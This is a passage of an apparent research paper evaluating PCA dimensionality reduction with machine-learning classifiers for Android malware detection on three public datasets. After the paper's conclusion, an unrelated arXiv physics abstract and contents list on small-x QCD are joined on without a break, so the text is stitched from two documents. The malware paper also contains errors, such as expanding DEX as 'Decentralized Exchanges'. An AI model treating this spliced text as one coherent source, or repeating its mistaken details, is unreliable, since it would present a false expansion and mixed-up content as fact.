mobile devices, they have enabled users to access to internet-based communications, emails and social media without the need for computers (Kalkbrenner, J., et al 2011). The integration of mobile payment capabilities into smartphones provide users with digital mobile wallets and contactless payment (Bezovski, Zlatko et al., 2016, Slade, Emmaet al., 2013). However, the threat of malware to Android OS has been growing over the past 10 years (Feizollah, Ali et al., 2017). To deal with epidemiological spread of Android based malware, Google developed Google Play Protect to secure and scan all mobile app submissions for embedded malware (Sawers, P., 2020). However, despite the preemptive step to contain the malware spread, Android platforms are still exposed to malware infiltrations and infections. Hence to contain this cyber epidemiological disaster, it is crucial for cyber investigators and digital forensics analysts using machine learning based classifiers have an effective means to deal with voluminous, veracity and variety of malware. Most existing android malware detection system and frameworks can be categorized into three groups, namely, Static analysis, Dynamic analysis, follow by a hybrid of the two methods. Static analysis detects Malware through source code permission and intent which allows fast detection. Prior to installation, the APK application is dissected, with its content such as Android Manifest.xml and DEX (Decentralized Exchanges) files being analyzed to determine if it's malicious. However, modern Android malware employs code obfuscation techniques to evade static analysis (Abdullah Talha Kabakus et al., 2018). Dynamic analysis investigates the actual behavior and processes of suspicious application in a real time environment to detect the presence of malware or malicious code. Dynamic analysis requires execution of APK on emulator or physical devices, refer to as sandbox, requiring sizeable amount of processing power and time (Elsersy, Wael et al., 2022). The use of hybrid analysis is becoming common in recent years. Many frameworks which combine static and dynamic analysis to characterize the behavior of malware analysis. (Abdullah Talha Kabakus et al., 2018, L. Taheri et al., 2019). Some researchers make use of Machine Learning algorithms to identified Android malware from benign software based on features from static, dynamic or hybrid analysis (Meghna Dhalaria et al, 2020). New methods of analysis which converts dissected APK files into datasets to perform classification have been deployed to improve Malware classification (Y. Fang et al.,2020). Moreover, more and more studies have been done to find a way to improve Machine Learning models. One of the methods is utilizing dimensional reducing methods such as Principal Component Analysis (PCA), Linear discriminant analysis (LDA) or T-Distributed Stochastic Neighbour Embedding (T-SNE). In our study, we evaluate the application of dimensional reduction method namely PCA and evaluate the accuracy performance of machine learning classifier algorithms to detect Android malware. In the next section, we will cover the related literature to our research. This is followed by a description of the research experiment that we applied that included the datasets involved and experimentation steps taken. An analysis of our research results follows. This is then concluded with our conclusion. ## 4 Literature Review There has been a growing number of android malwares. According to Statista Research, as of month of March 2020, a total of 482,579 android malware have been detected. (statista.com., 2022) There are various research done in the identification of android malware based on static and dynamic analysis. Research on the effectiveness of dynamic analysis of Android intent features and Android Permission features in Android malware detection had a detection rate of 91% and 83% respectively, with a combination of both intent and permission features achieving a higher detection rate of 95.5% (Feizollah, Ali et al., 2017). Earlier research proposed on the use of static analysis based solely on permissions and creating probabilistic generative model for risk scoring (Peng, et al.,2012). Stowaway, a tool developed to detect over privilege of Application Programming Interface (API) calls and mapping these set of API calls to permissions (Felt, Adrienne et al., 2011). Information on the permission required of an android application can be found in Androidmanifest.xml file in the apk which can be extracted using AXMLPrinter2 tool (P. P. K. Chan et al., 2014). Unlike static analysis, which is vulnerable to code obfuscation, dynamic analysis monitors the artifacts generated by the executed apk in physical phone or virtual environment. (Feizollah, Ali et al., 2017). Research have been conducted using CICAndMal2017 dataset to generate network traffic on actual smartphones using a systematic approach rather than virtual emulators (Habibi Lashkarii et al., 2018). Machine learning (ML) classifiers such as Decision Tree (DT), Random Forest(RF), K-Nearest Neighbors(KNN), Naives Bayes(NB) and Support Vector Classifier(SVM) are common supervised learning algorithms used by researchers to perform both binary and family classification of malware (Noorbehbahani et al., 2019, Dhalaria, M et al., 2020, Sangal, Aviral et al., 2020, Abdullah, Talal et al., 2020). Research on evaluating the performance of permission feature dataset compared to permission and API calls dataset used common ML classifiers that includes Naive Bayes, Support Vector Machine (SVM), decision tree and Random Forest (RF) (P. P. K. Chan et al., 2014, S. E. Mohamed et al., 2021). These traditional ML classifiers are often used by researchers as baseline to compare against the performance of deep learning models and framework (M. Masum et al., 2019, El Fiky, A. H., 2020). Common evaluation metrics used by researchers include Accuracy, F1, Precision, Recall, True Positive Rate (TPR), False Positive Rate (FPR) and Area under Curve(AUC). Researcher Samaneh Mahdavifar used semi-supervised deep neural network algorithm to perform category classification of malware. In his work, he created the CICMalDroid2020 dataset consisting of five categories of Android malware, namely, Adware, Banking, SMS (Short Message Service), Riskware and Benign. Common tools such as CuckooDroid and CopperDroid are commonly used to collect dynamic dataset of APK (Mahdavifar, Samaneh et al., 2020, Dhalaria, M et al., 2020). Aside from ML, Natural language processing algorithms were used to extract ASCSII strings from Android APK. These were further processed into individualized words. With these collection of words, they were then converted into lexical features. These features vectors are then used as inputs into ML classifiers such as random forest and convolution neural network. The combination of these techniques were assessed to be effective in the detection of Android malware (Mimura, M., 2022). Feature selection techniques have typically used to reduce the features that are not useful in the dataset to improve accuracy of the ML models (Fiky A. H. E., et al, 2021). Such techniques also improve the processing time and prevent model over-fitting hence resulting with models that are more robust and generalized. Common feature selection technique includes Information Gain (IG) technique which ranks a feature by calculating the information gain. The need to process large volume of data have also result in dimension reduction techniques gaining much of the attention. Testing of ML classifiers with large datasets can be time consuming. Dimensionality reduction reduces the high dimensional vector-valued explanatory variables while able to preserves its relationship with a low dimensional space (Zhang, T et al., 2018). Research was done to explore other ways to improve the processing time. This includes training ML classifiers with reduced dataset of smaller sizes based on random sampling and stratified random sampling. There has been some research on the application of PCA on analysis of Android malware (D, Arivudainambi et al., 2019). Studies have also been conducted to compare the performance difference of dimension reduction techniques with PCA and LDA (Durmus Ozkan Sahin et al., 2021). Most of these studies do not make direct reference to experimental results from other literature or to use different malware datasets to understand the benefits of PCA. Combination of PCA and feature selection technique IG have been studied by researcher El Fiky (El Fiky, A. H., 2020) to create an optimized technique to reduce 89% of total features. They tested with three baseline classifiers and managed to achieve good F-measure results with Random Forest. However, the combination of Drebin and Malgenome dataset used in the research does not address to the issue of imbalance nature of both datasets. The entire Drebin dataset contains 4.3% of malware (Xu, Jiayun,, et al, 2021). Both datasets have often been used by various researchers to develop frameworks to improve malware classification and detection (M. Masum et al., 2019, El Fiky, A. H., 2020). There is a need to investigate the impact of unbalance dataset on Android malware detection research. More studies are needed to investigate the effects of dimensionality reduction technique, feature selection techniques and balancing of datasets to improve on accuracy of malware detection hence the relevance of this research work. ## 5 Proposed Methodology ### Datasets The proposed methodology involves using three different datasets, namely, CICInvesAndMal2019, Drebin and Android Malware Detection and Classification for analysis and research. Dataset-1 used in our research is Malgenome dataset. The dataset consists of 1260 Android malwares belonging to 49 malware families and 2539 benign APKs. The dataset has feature vectors of 215 attributes. The entire dataset took more than a year of reading through security blogs from existing anti-virus companies, lodging requests for samples and web crawling to obtain the malware samples (Y. Zhou et al., 2012). Due to limited resources, they have since stop updating the dataset from 2015 onwards. However, other researchers further processed the dataset collection to extract the features by decompiling Android manifest files using the tool AXMLprinter2. API calls were also extracted using Baksmali disassembler tool (S. Y. Yerima,, 2019). Dataset-2 used in our research is the Drebin dataset initially created by MobileSandbox project. (M. Spreitzenbarth., 2013) It includes 5,560 malwares from 179 different malware families. Drebin datasets include data on static analysis such as applications' manifest, dex code and permissions. (D. Arp., 2014) In our experiments, we utilized the dataset extract by S. Y. Yerima for their paper "DroidFusion: A Novel Multilevel Classifier Fusion Approach for Android Malware Detection" in 2019. This dataset includes 5,560 malwares and 9,476 benign apps. The dataset also uses 215 features and contains 2 classes to classified malware and benign. Dataset-3 used in our research was called CIC-InvesAndMal2019 dataset (Sangal, Aviral., 2020). The dataset was retrieved from Canadian Institute for Cybersecurity. The dataset includes permissions and intents as static features and API calls. The dataset has 5,491 collected samples with 426 malware and 5,065 benign. There are four malware classification in the dataset. They are Adware, Ransomware, Scareware and SMS Malware. The following table summarises the datasets used with our research work. ### Methodology Our experiment involved that replication of the use of software tools or Python development packages along with machine learning parameters mentioned in cited literature. For those literature without information regarding detailed parameters, we selected and tested the best parameters based on nearest metrics. \begin{table} \begin{tabular}{|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|} \hline Datasets & Number of samples & Number of malwares & Number of benign & Number of features \\ \hline Malgenome & 3799 & 1260 & 2539 & 215 \\ \hline Drebin & 15036 & 5560 & 9476 & 215 \\ \hline CIC-InvesAndMal2019 & 5,491 & 426 & 5,065 & 253 \\ \hline \end{tabular} \end{table} Table 1: Datasets and their samples Figure 1: Number of Malware and Benign Samples in Each Dataset Based on the three different datasets, we compared the test results from cited literature with the results of dataset processed with PCA prior to splitting the dataset into train and test to be used on ML classifiers based on respective literature. Some of the research may contain specific steps in data processing which will be mentioned in experiment and results. We apply K-Folds cross validation to ensure less biasness when training and testing our model (Waziralli, Ret al., 2020). Most of the results are obtained with tenfold cross validation using WEKA and python. (S. Y. Yerima et al.,.,2019, Akintola A.G. et al., 2022, El Fiky, A. H., 2020). Based on the evaluation metric, the performance of our testing of ML classifiers were compared with cited literature using similar dataset to validate if dimensionality reduction can be applied to Computation Forensic while achieving satisfactory results. ### Performance Evaluation Metrics Since various kinds of literature use different evaluation metrics, our study will be based on multiple different evaluation metrics in cited literature instead of using the common metrics. i. Accuracy measures the overall rate at which the model correctly predicts the label: \[Accuracy=\frac{TP+TN}{\text{TP}+\text{FP}+\text{TN}+\text{FN}}\] ii. F-score is the harmonic mean of both the recall (R) and precision (P) metrics. It is commonly used to evaluate the performance of binary classification model. F-score can be computed as defined in Equation: \[Fscore=\frac{2\ \times\ \text{TP}}{2\ \times\ TP+FP+FN}\] F-score can be enhanced into F-beta score where beta is used to choose the weight between precision and recall. \[F_{\beta}=(1+\ \beta\ )\frac{\text{Precision}\ \times\text{Recall}}{(\beta^{2}\ \times\ Precision)+Recall}\] iii. Precision is used to measure the True Positive Rate of the dataset and can be calculated by using below Equation: \[Precision=\frac{TP}{\text{TP}+\text{FP}}\] iv. Recall is commonly used to measure how much of the dataset is accurately identified: \[Recall=\frac{TP}{\text{TP}+\text{FN}}\] Figure 2: Proposed Approach Illustration ## 6 Results and Discussion In this section, we identified 2 literatures for each dataset. To get comparable results for ML classifiers used in past literature, we attempt to reproduce the experiment scenario. The dataset is then processed with PCA and passed into ML classifiers. This is to ensure the reliability of our test results. ### Results From Malgenome Dataset We selected two relevant literatures that used on Malgenome dataset. The first literature is Empirical Analysis of Forest Penalizing Attribute and Its Enhanced Variations for Android Malware by Akintola A.G. which is a journal from MDPI (Akintola A.G. et al., 2022). The second literature we selected is Empirical Study on Intelligent Android Malware Detection based on Supervised Machine Learning by Abdullah T.A, published in IJACSA in United Kingdom (Abdullah Talha Kabakus et al., 2018). Malgenome dataset is commonly used in research on ML classifier performance, study on effectiveness of intents, permission and API calls in malware classification and application of dimensionality reduction techniques to achieve high performance in ML algorithms with less computational resources (S. E. Mohamed et al., 2021). (Refer to Appendix Section 1 for features breakdown). In the first literature, Akintola A.G. conducted an empirical study to validate using Forest Penalizing Attribute (FPA) classifier, followed by enhanced FPA to detect android malware. In our study, we will not investigate into the enhanced FPA variants. Figure 3 shows the baseline classifiers used to compare with FPA (Akintola A.G. et al., 2022). Synthetic minority oversampling technique, known as SMOTE, was used by Akintola A.G. to solve class imbalance issues found in the Malgenome dataset. Our research plan was to apply PCA on the Malgenome dataset and evaluate the resultant dataset using the performance evaluation metrics. To reproduce her results, we used WEKA and performed a K-fold cross validation with k-fold set to 10 folds. Apart from \(+2\%\) improvement in DETAB for accuracy over researcher Akintola A.G. results, most results are consistent. NB kernel estimator parameter is set to True. (Refer to appendix Section 1 for Table 1 Original dataset Results) Figure 3: Baseline Classifiers used in Akintola research Figure 4 shows the top three algorithms before and after PCA. FPA performs the best among all the classifiers with highest accuracy at 0.9894. (Refer to appendix section 1 Table 2 for PCA results) The accuracy increased by 0.002 for DETAB, a drop of 0.001 for ADT (Alternating Decision Tree) and 0.009 drop for FPA. We can see that PCA successfully reduced the number of features from 215 to 142 while continuing to achieve good results for these algorithms. In figure 5, we examine the algorithms with lower performance. While most classifiers have accuracy of above 0.9, both CR (Conjunctive Rule) and DS had accuracy measurements below 0.8 before PCA. When PCA with variance of 0.95 was applied, both NB and BN (Baye Net) suffered a drop of 0.098 and 0.038. However, DS and CR improved 0.140 and 0.145 respectively. Weak models such as DS and CR were unable to handle a large number of features in the dataset. As DS is a one level decision tree, the first few features of PCA managed to capture majority of the variance in the dataset (Wayne Iba et al., 1992,. J. Chandrasekaran,, 2020). This gives the first feature of PCA more Figure 4: Top three algorithms before and after PCA Figure 5: Remaining algorithms before and after PCA prediction power than the first feature in the original dataset. Ensemble classifiers such as AdaBoost1 are often used to improve accuracy of weak learners (J. Chandrasekaran,, 2020). (Refer to appendix section 1 Table 2 for PCA results) Next, we proceeded to vary the amount of variance captured starting from 0.85 in increments of 0.5 to 0.99 to investigate the trend of variance captured. (Refer to appendix Table 3 full results) At a variance of 0.85, both NB and BN suffered a drop in accuracy of 0.099 and 0.022. This indicates that some of the important features may have been lost during dimension reduction (Durmus et al., 2021). Varying the amount of variance explained from 0.85 to 0.99 exhibit negligible differences of about 0.001 accuracy for most algorithms. DETAB accuracy and F-measure increased by 0.021 and 0.028 at PCA 0.85. Further increase in PCA from 0.85 to 0.99 did not contribute to any improvement. To conclude, increasing explained variance from 0.85 to 0.99 in general does not bring about significant improvements. NB does not perform well with PCA dataset in all explained variance. (Refer to appendix Section 1 graph 1 for full results) The Malgenome dataset has class imbalance based on the proportion of benign and malware APKs. The imbalance ratio (IR) of benign and malware is 2.015. Synthetic Minority Oversampling Technique known as SMOTE is often used to oversample the minority class (Durmus Ozkan Sahin et al., (2021), Chen, Zhenxiang et al., (2017)) to eliminate class imbalance issue. Figure 6: F-measure and Accuracy graph at different explained variance Figure 7: Accuracy and F-measure results for PCA dataset with and without SMOTE Based on the data preprocessing details in the Akintola A.G. experiment, we randomized the dataset prior to the 70:30 split. SMOTE was applied to rebalance the training dataset, which will be used for 10-fold cross validation. Like Akintola A.G. findings, SMOTE improved the overall accuracy, F-measure, and AUC of most algorithms, with FPA also had a 31.25% improvement in FPR. Next, we performed PCA on the Malgenome dataset. We then performed a 70:30 split on the PCA dataset prior to applying SMOTE on training dataset. Again, both NB and BN suffered a drop in accuracy while both DS and CR improved in accuracy (Refer to appendix Section 1 for Table 4 and graph 2 for entire results). These results and behaviors were similar to applying PCA on the original dataset without performing SMOTE. PCA did not further improve the accuracy of SMOTE results. In the second literature, Abdullah T.A. conducted a study on Android malware detection with six supervised ML classifiers. Two evaluation methods were used in his research, namely holdout validation with 80% training, 20% testing dataset and 10-fold cross validation. 10-fold cross validation was based on the mean score of total folds. Similar to Abdullah T.A., we used Jupyter notebook and Python 3.8. Figure 8 shows the parameters and models used in his literature. We managed to reproduce results close to the literature. In this section, we compared the performance of classifiers based on Accuracy and F1-score. (Refer to appendix Section 1 Table 4 for test results). For PCA, we set the explained variance to 0.95. Based on figure 9, the accuracy of k-NN in holdout increased by 0.003 while 10-Fold resulted in a drop by 0.01. The F1-score saw improvement for k-NN by 0.004 while 10-Fold improved by 0.006. Decision Tree had accuracy improvement in Holdout by 0.004 and a decrease in accuracy by 0.012 for 10-Fold. The F-measure also improved for Holdout by 0.04 but decreases by 0.012 in 10-Fold. Both SVM and LR saw an improvement in PCA results for both accuracy and F1-score. For SVM, accuracy increased by 0.005 for Hold out and 0.003 for 10-fold. For F1-score, it increased by 0.008 and 0.003. For LR, accuracy increased by 0.021 for Hold out and 0.009 for 10-fold. For F1-score, it increased by 0.017 and 0.013. In general, PCA successfully transformed and reduced the number of features in the Malgenome dataset from 215 to 142 components at 0.95 explained variance, while giving good results and even about 2% improvements in SVM and LR (bilinear). However, NB algorithms had the worst performance. PCA generated negative correlation values while centering which will result in error in NB using the Multinomial model. We set to MinMaxScalar() from StandScaler() to normalize the input values to 0 and 1. The result drops significantly for NB using the Multinomial model for F1-score by 0.414 and Accuracy by 0.289 for Holdout, 0.286 and 0.414 for Figure 8: Parameters and Models used for HOLDOUT and 10-FOLD Figure 9: No PCA and PCA Accuracy and F-measure results for HOLDOUT & 10-FOLD 10-Fold. Our AUC result for NB at 0.5 indicates that the NB model is not useful. (Refer to appendix Section 1 Table 6) Next, we proceeded to vary the explained variance from 0.85 in increments of 0.05 to 0.99 to investigate performance of Classifiers as explained variance increases. Most algorithms performed well based on Accuracy and F1-score despite PCA reducing the number of components. We removed NB from the overall graph as the model exhibits low performance in PCA. From figure 11, for k-NN, PCA improved the F1-score to 0.9876 with explained variance set to 0.90. Further increases in explained variance saw decrease with the F1-score. DT had the best F1-score at 0.98 without PCA. The best F1-score with PCA for DT was 0.9676 at explained variance of 0.95. For SVM, F1-score at explained variance of 0.85 decreased to 0.9823 and then improved when explained variance was increased. The peak F1-score was 0.9926. For RF, PCA at 0.85 initially decreased the F1-score to 0.9804 and then it peaked at 0.9926 when PCA was 0.90. Further increase of explained variance results in decreased performance. LR (bilinear) shows an increase in F1-score as the explained variance increased. The peak F1-score occurred at explained variance of PCA at 0.99. Based on the Accuracy graph, the trend of incremental increase of explained variance from 0.85 to 0,95 was identical to F1-score for most classifiers apart from k-NN, where PCA did not have much impact on the accuracy. DT saw a decrease in accuracy of 0.0142 with PCA dataset. Further increase in explained variance to 0.95 only saw an improvement of 0.0021. Due to the imbalance nature of the Malgenome dataset, F1-score, which balances between Precision and Recall value is a more suitable evaluation metric compared to accuracy. Figure 11: Comparison of Accuracy and F1-score Results Based on Different PCA explained variance Figure 10: Accuracy and F1-score Results Based on Different PCA explained variance Based on our findings from both research for Malgenome dataset, PCA successfully reduced the number of features from 215 to 98 at explained variance of 0.85, which is a 54.4% reduction in features, while continuing to achieve good results for FPA, ADT, k-NN, SVM, DETAB and LR algorithms. However Naive Baye algorithm is not suitable for PCA dataset as AUC, area under receiver operating characteristic curve (ROC) is 0.5, like tossing a coin. While application of SMOTE on unbalanced dataset did improve the Accuracy of NB (2.68%), BN(1.77%), CR(5.98%), DETAB(1.83%), ADT(0.13%), DS(4.23%) and FPA(-0.09%), application of PCA to Malgenome dataset, follow by SMOTE did not improve the accuracy and f-measure. ### Results From Drebin-215 For Drebin dataset, we chose 2 literatures. With Suleiman Y. Yerima's research, they studied the 5 machine learning models and proposed DridFushion framework (S. Y. Yerima and S. Sezer, et al.,2019). Their ML results were compared to the results from the DridFushion Framework. For our study, we focused on applying PCA to the same 5 models and studied the results. To get accurate comparisons, we tried to achieve equivalent results by following the parameters mentioned in the research and using the same machine learning tool which is WEKA. We used 10-fold cross-validation to validate the results. We set 4 different variance R=0.85, R=0.9, R=0.95 and R=0.99 for PCA to compare the effect of variance on datasets and models. The evaluation metrics of Precision M, Recall M, Precision B, Recall B, Weight F Measures were used for this study. Based on the results, the effects of different PCA R values were insignificant on J48. The difference was less than 1% and ranged from 0.969 to 0.971. On the other hand, increased in PCA values improved results for Voted Perceptron classifier. When PCA's R value was 0.85, weight F measure of Voted Perceptron was 0.964 but when R value was 0.99, the weighted F measure increased to 0.973. Other evaluation metrics also increased slightly when R value was increased. As for REPTree classifier, the best results were obtained when R value was 0.85. When R value was increased by 0.05, the results dropped slightly but the results improved again when R value was 0.95. However, when R value was increased to 0.99, the results declined and became lower than the results when R value was 0.85. These fluctuations of results showed that over fitting or under fitting of features will not get the optimum results. As for Random Tree, two different models were used. We had assumed that when author mentioned Random Tree 100 and Random Tree 9, 100 and 9 are the parameters for K value. Random Tree-100 study illustrated that the best PCA R value for this model is 0.95. When R value of 0.90 and 0.99 were applied, the result metrics were almost the same and lowest among all 4 different R value experiments. The second-best values have resulted when R value was 0.85. On second experiment for Random Tree, K value was changed to 9. During this experiment, the results were \begin{table} \begin{tabular}{|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|p{56.9pt}|} \hline Classifier & PrecM & RecM & PrecB & RecB & W-FM \\ \hline J48 & 0.972 & 0.964 & 0.979 & 0.984 & 0.9766 \\ \hline REPTree & 0.976 & 0.951 & 0.972 & 0.986 & 0.9730 \\ \hline Random Tree-100 & 0.975 & 0.978 & 0.987 & 0.985 & 0.9824 \\ \hline Random Tree-9 & 0.947 & 0.971 & 0.983 & 0.968 & 0.9672 \\ \hline Voted Perceptron & 0.969 & 0.950 & 0.971 & 0.982 & 0.9701 \\ \hline \end{tabular} \end{table} Table 2: Results from cited literature remarkedly declined when higher R values were applied. R=0.85 gave the best results and R=0.99 gave the lowest results. Except for the Voted Perceptron Classification, the rest of the models gave better results without PCA. As for Voted Perceptron, when PCA R value of 0.99 was applied, the Weight FM measure was slightly better than original results. Additionally, all 4 experiments showed that Precision and Recall value of Benign were higher than Precision and Recall value of Malware. The difference was more significant in Random Tree-9 model. The second dataset we had chosen was "Droid-NNet: Deep Learning Neural Network for Android Malware Detection" published in IEEE International Conference on Big Data (Big Data), 2019. This article purposed the deep neural network called "Droid-NNet" to detect malware. "Driod-NNet" was specifically modelled to detect Android datasets. The literature also studied three traditional classification models such as Decision Tree, Support Vector Machine (SVM) and Logistic Regression. The results were compared to illustrate the robustness and effectiveness of Droid-NNet. (M. Masum and H. Shahriar, et., 2019) Figure 12: Weighted F-Measure Results Figure 13: Precision and Recall Results Based on Different PCA R Values However, for our study, we have chosen results from traditional classification models to apply PCA. Python 3.8 and scikit-learn library were used to collect the evaluation results. The results were validated by using 10-fold cross-validation and using a standard scalar to scale the dataset. We also reused the same parameters used in original paper. 'rbf' for SVM Kernel vale, 'Gini' for Decision Tree criterion, and L2 for the Logistic Regression penalty. The evaluation metrics utilized are True Positive Rate(TPR), False Positive Rate and F-beta score. The Drebin dataset has an unbalanced ratio of data and accuracy of the results may not give accurate representation of model's performance. Thus, F-beta score was used to determine the performance of the models. (M. Masum and H. Shahriar, et.,2019). To give more weight to recall, beta value 10 was used. We applied 4 values for R: 0.85, 0.90,0.95,0.99. However, none of the R values gave better results compared to original F-beta Score. For Decision Tree, the results declined after PCA was applied. When PCA 0.85 was applied, the F-beta score value dropped to 0.967 from 0.978. R value of 0.90,0.95 and 0.99 gave the same results at 0.966. SVM also resulted with poorer results compared to the original results. At R=0.85, F-beta score was decreased by 1%. However, the value improved gradually when we applied higher R values. When R=0.99 was applied, the difference was only 0.004. Similarly, Logistic Regression gave lower results in 0.85 but the results were slightly improved when R=0.90 was applied. These results showed us that applying PCA does not necessarily improve F-beta Score. As for the other evaluation metric, please refer to the appendix. \begin{table} \begin{tabular}{|l|l|l|l|} \hline Classifier & TPR (True Positive Rate) & FPR (False Positive Rate) & F beta Score \\ \hline Decision Tree & 0.973810 & 0.019305 & 0.978411 \\ \hline SVM & 0.961111 & 0.008280 & 0.981564 \\ \hline Logistic Regression & 0.976190 & 0.004850 & 0.988858 \\ \hline \end{tabular} \end{table} Table 3: Results from cited literature Figure 14: F-beta Score Results Based on Different PCA R Values ### Results from Cic-invesandmal2019 For the CIC-InvesAndMal2019 dataset, we have selected 2 reference papers for our research. First Paper, (Sangal, Aviral., 2020) applied the Principal Component Analysis (PCA) which is a feature reduction technique for malware detection. For the data processing phase, the researchers ensured that there is no missing value. Principal Component Analysis was applied after data processing phase and total of 100 attributes was selected. Cross-validation 10-fold was being applied for the classification. However, there was no mention on the variance applied for PCA. For the classifier, Naive Bayes (NB), Support Vector Machine (SVM), Random Forest, Decision Tree, and Nearest Neighbours (K1) were used in the paper. The researcher performed the experiment by WEKA, which we similarly applied and performed in our research. The accuracy of the related paper is as shown below in Table 4. Second Paper, (Viraj Kudtarkar., 2020) had only 384 samples of botnet applications and 1105 samples of clean nonmalicious applications. The researcher extracted the data using APK tool after the decompression of the APK files and extraction of the required features from the source code. This extraction included essential information such as intents and user permissions. A total of 18 features were selected in data selection and data-pre-processing phase. The researcher then divided the data into 70:30 portions for training and testing respectively. For the classification algorithms, five classifiers were used for training which are Naive Bayes (NB), Support Vector Machine (SVM), Random Forest, Decision Tree, and Logistic Regression as below in Table 5. The result from the cited paper is as shown below without PCA. Both papers had 4 common algorithms with one additional that differed from the other. For our experiment, we included both additional algorithms namely Nearest Neighbours and Logistic Regression to align measurements. We defined 4 different PCA variance R=0.85, R=0.9, R=0.95 and R=0.99 to compare which has the most effective and reliable model. Accuracy, Precision, Recall and F Measures are the evaluation metric for the algorithm. Random Forest had the highest accuracy after the application of PCA with 96.05%. Naive Bayes had the lowest accuracy rate of 88.23%. Meanwhile, the second paper had the highest accuracy result of 95.40% for Logistic Regression classifier. On the other hand, SVM had low accuracy compared to others with 83.10%. For Decision Tree, Navie Bayes, and Logistic Regression, after applying PCA with different variance saw their accuracies drop significantly. \begin{table} \begin{tabular}{|l|l|l|l|l|} \hline & Accuracy & & & \\ Classifier PCA & Result & Precision & Recall & F-Measure \\ \hline Naive Bayes (NB) & 88.23\% & 0.877 & 0.882 & 0.877 \\ \hline SVM & 91.26\% & 0.912 & 0.913 & 0.908 \\ \hline Random Forest & 96.05\% & 0.96 & 0.961 & 0.969 \\ \hline Decision Tree (J48) & 92.90\% & 0.929 & 0.929 & 0.931 \\ \hline Nearest Neighbours (ibk) K 1 & 93.88\% & 0.939 & 0.939 & 0.925 \\ \hline \end{tabular} \end{table} Table 4: Results from sited Literature above, Aviral Sangal [5] \begin{table} \begin{tabular}{|l|l|l|l|l|} \hline & Accuracy & & & \\ Classifier & Result & Precision & Recall & F-Measure \\ \hline Naive Bayes & 94.80\% & 0.841 & 0.958 & 0.891 \\ \hline SVM & 83.10\% & 0.841 & 0.958 & 0.891 \\ \hline Random Forest & 87.60\% & 0.879 & 0.97 & 0.917 \\ \hline Decision Tree & 94.30\% & 0.945 & 0.982 & 0.959 \\ \hline Logistic Regression & 95.40\% & 0.949 & 0.994 & 0.964 \\ \hline \end{tabular} \end{table} Table 5: Results from sited Literature above, (Viraj Kudtarkar., 2020) Based on our results, the variance change R did not significantly change for the accuracy except for the Random Forest while using R=0.85 which resulted in the best accuracy of 99.89%. Other results are 90.40% and 90.30% for Random Forest while using different variances, the rest of the classifiers had significant changes in accuracy depending on the variance applied. From the result we observed that variance R=0.85 is the best for Random Forest and K Nearest Neighbor classifiers which had the best accuracy. When R value was increased slightly by 0.05 and set to 0.9, the results dropped significantly on Random Forest and K nearest Neighbors. There was no significant difference between 0.95 and 0.99. The recall result gradually decreased when the R value is increased. The recall result as of 0.85 has "0.871" and it's gradually dropping as "0.741,0.742,0.736". This proved that overfitting or underfitting of features will not achieve optimum results. Figure 15: Accuracy Results Based on Different PCA R Values ## 8 Conclusion & Discussion Principle Component Analysis (PCA) is a dimension reduction technique widely used in various scientific industries that handles large high dimensional dataset, where the number of features is greater than the amount of data. For example, they are commonly used in computer vision, image recognition and to produced 2-dimensional data for visualization. However, there has been a lack of study in the effects of dimensional reduction technique to Computational Forensics and specifically with malware detection and analysis. This study focuses on the application of PCA in the analysis of 3 different malware analysis related datasets containing Android malware. We also evaluate the impact of imbalance classes within the dataset with dimensional reduction. Based on our experiments where we conducted parallel experiments done by other researchers on the same datasets, we observed that the performance measurements of machine learning models generally comparable with marginal degradation with dimensional reduced datasets after the application of PCA. We did observe notable degradation with the reduction of variance range of 0.85 to 0.99 when PCA is applied to the datasets. There were a few improvements observed with no noted pattern or specific algorithms. With imbalance classes within the dataset, we observed that the application of Synthetic minority oversampling technique (SMOTE) then with applied dimensionality reduction had performance degrade with the reduction of variance. For future works, we hope to extent our work to different malware datasets which includes dynamic and memory forensic dataset for Android malware. Other Dimension reduction and feature selection techniques can be included in our future studies to improve processing of high dimensional data generated by intrusion detection systems.
2304.12842
Small $x$ Physics Beyond Eikonal Approximation: an Effective Hamiltonian Approach
Understanding the spin structure of hadrons in the small $x$ regime is an important direction to unravel the spin puzzle in hadronic physics. To include spin degrees of freedom in the small $x$ regime requires going beyond the usual eikonal approximation in high energy QCD. We developed an effective Hamiltonian approach to study spin related observables in the small $x$ regime using the shockwave formalism. The small-$x$ effective Hamiltonian incorporates both quark and gluon propagators in the background fields and the background field induced interaction vertices up to next-to-eikonal order. A novel feature of sub-eikonal interactions is the background gluon field induced gluon radiation inside the shockwave. Its relation to chromo-electrically polarized Wilson line correlator is established both in small $x$ helicity evolution and in longitudinal double-spin asymmetry for gluon production.
Ming Li
2023-04-25T14:16:33Z
http://arxiv.org/abs/2304.12842v2
# Small \(x\) Physics Beyond Eikonal Approximation: an Effective Hamiltonian Approach ###### Abstract Understanding the spin structure of hadrons in the small \(x\) regime is an important direction to unravel the spin puzzle in hadronic physics. To include spin degrees of freedom in the small \(x\) regime requires going beyond the usual eikonal approximation in high energy QCD. We developed an effective Hamiltonian approach to study spin related observables in the small \(x\) regime using the shockwave formalism. The small-\(x\) effective Hamiltonian incorporates both quark and gluon propagators in the background fields and the background field induced interaction vertices up to next-to-eikonal order. A novel feature of sub-eikonal interactions is the background gluon field induced gluon radiation inside the shockwave. Its relation to chromo-electrically polarized Wilson line correlator is established both in small \(x\) helicity evolution and in longitudinal double-spin asymmetry for gluon production. ## 1 Introduction * 2 Small-\(x\) Effective Hamiltonian * 2.1 Light-cone Hamiltonian in the background fields * 2.2 Expansion in eikonality * 2.3 Effective light-cone Hamiltonian up to sub-eikonal order * 3 Single Particle Scattering Amplitude * 3.1 Single (anti)quark scattering amplitude * 3.2 Single gluon scattering amplitude * 3.3 Background field induced quark-gluon conversion * 3.4 Quark-antiquark pair converted to two gluons * 4 Gluon Radiation Inside the Shockwave * 4.1 Longitudinal double-spin asymmetry for soft gluon production * 4.2 Small \(x\) evolution of polarized Wilson line correlator * 4.2.1 Operator treatment * 4.2.2 Directly calculating the diagrams * 5 Summary * A Boost Transformations of Vector and Spinor Fields * B Convention for Light-Cone Quantization * C Sub-eikonal Transformations Related to \(a^{-}\) Field Introduction Understanding the spin structure of proton is one of the central problems in hadronic physics. Since the discovery by the European Muon Collaboration (EMC) [1] showing that quark's intrinsic spin only contributes to a small portion of proton's spin, many experimental and theoretical efforts were devoted to understanding the proton spin puzzle [2; 3; 4; 5]. Theoretical studies [6; 7] point out that besides quark's intrinsic spin, gluon's intrinsic spin (helicity), quark and gluon orbital angular momentum can contribute to 